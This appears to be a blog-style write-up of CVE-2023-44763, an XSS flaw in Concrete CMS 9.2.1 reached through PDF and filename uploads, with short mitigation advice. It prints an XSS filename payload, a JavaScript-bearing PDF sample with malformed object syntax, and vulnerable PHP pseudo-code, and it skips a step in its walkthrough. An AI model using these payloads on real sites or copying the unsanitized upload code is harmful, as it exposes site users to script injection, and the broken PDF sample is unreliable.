CVE-2023-44763 - Exploiting Concrete CMS v9.2.1 - Arbitrary File Upload (XSS) via Thumbnail PDF Upload

---

Introduction

Concrete CMS is a popular open-source content management system used by many organizations to build and manage websites. In late 2023, security researchers discovered a serious vulnerability in Concrete CMS version 9.2.1. Tracked as CVE-2023-44763, this bug allows an attacker to upload a malicious file through the thumbnail upload feature. With some simple tricks, attackers can turn this into a Cross-Site Scripting (XSS) attack and potentially compromise site users. In this post, we'll break down how this vulnerability works, see some example exploit code, and talk about how to stay safe.

Core Problem

Concrete CMS lets administrators and editors upload files, including images and PDFs, to create thumbnails and preview content. It tries to restrict dangerous file types like PHP or JavaScript, but by default, PDF files are on the allowed list.

The problem is: PDF files can contain embedded JavaScript or even obfuscated HTML, and if the CMS doesn’t fully sanitize file contents or filenames, it can be tricked into serving up content that executes in the viewer's browser—classic XSS.

The CMS creates a thumbnail or preview for the file, which later gets shown in the browser.

- Malicious JavaScript in the PDF or in the filename can execute, hijacking user sessions or stealing data.

What Did the Vendor Say?

When confronted, the Concrete CMS team said they think *customers should know* to remove "pdf" from the allowed file types. However, the default settings in Concrete CMS do allow PDF. This mismatch is why this bug turned into a real, exploitable risk for anyone using stock installs.

Show Me the Exploit

All you need is access to the file upload feature, which any editor or admin might have.

Step 1: Craft a Malicious PDF

There are many ways to add JavaScript to a PDF. Here’s a very basic way using pdf.js or with software like Adobe Acrobat, but for a quick XSS demo, we can actually focus on filenames.

Concrete CMS doesn’t always sanitize filenames properly. You can try uploading a file named

"><script>alert('XSS')</script>.pdf

If the CMS embeds this filename in an HTML attribute without encoding it, the script pops!

More reliably, you’d create a PDF file containing

%PDF-1.4
1  obj
<< /Type /Catalog
   /OpenAction 2  R
>>
endobj
2  obj
<< /S /JavaScript /JS (app.alert('XSS in PDF')) >>
endobj
trailer
<< /Root 1  R >>
%%EOF

Step 3: Trigger the XSS

- Go to any page where the thumbnail/preview is shown.

Here’s a pseudo-code view of the code that fails to sanitize filenames

// Backend logic (simplified)
$filename = $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], "/uploads/files/" . $filename);
echo "<img src='/uploads/files/$filename'>"; // vulnerable if $filename not sanitized

References

- Exploit Database: CVE-2023-44763
- NVD Details: CVE-2023-44763
- Concrete CMS Security Policy
- Proof-of-Concept (POC) PDF XSS Generator

Scan for Existing Malicious Files:

If you've let users upload for a while, check your /uploads directory for weirdly named files or PDFs with JavaScript inside.

Conclusion

CVE-2023-44763 shows the danger of trusting default configurations and not treating “safe” filetypes like PDFs with enough caution. If you’re running Concrete CMS 9.2.1 or earlier, double-check your allowed file types and sanitize everything you output. XSS is a serious risk—don’t let a simple file upload put your users in danger!

If you want more details, check the official vendor advisory and community resources.

Timeline

Published on: 10/10/2023 12:15:09 UTC
Last modified on: 11/07/2023 04:21:40 UTC